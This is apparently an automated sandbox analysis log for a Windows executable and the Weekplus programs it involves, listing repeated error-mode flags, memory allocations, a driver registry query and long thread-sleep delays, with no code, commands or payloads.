Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Memory allocated: 3680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Memory allocated: 1D8F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Memory allocated: ED0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Memory allocated: 1B5B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Program Files\Weekplus\GamePlusPlus.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599844	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599607	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598812	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598703	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 598016	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597794	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597365	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 597097	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596856	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595311	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594514	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594388	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Thread delayed: delay time: 594265	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Window / User API: threadDelayed 7998	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Window / User API: threadDelayed 1854	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Window / User API: threadDelayed 6628	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Window / User API: threadDelayed 3014	Jump to behavior

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 6904	Thread sleep count: 7998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 6904	Thread sleep count: 1854 > 30	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -599031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -598016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597365s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -597097s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe TID: 7132	Thread sleep time: -596856s >= -30000s	Jump to behavior
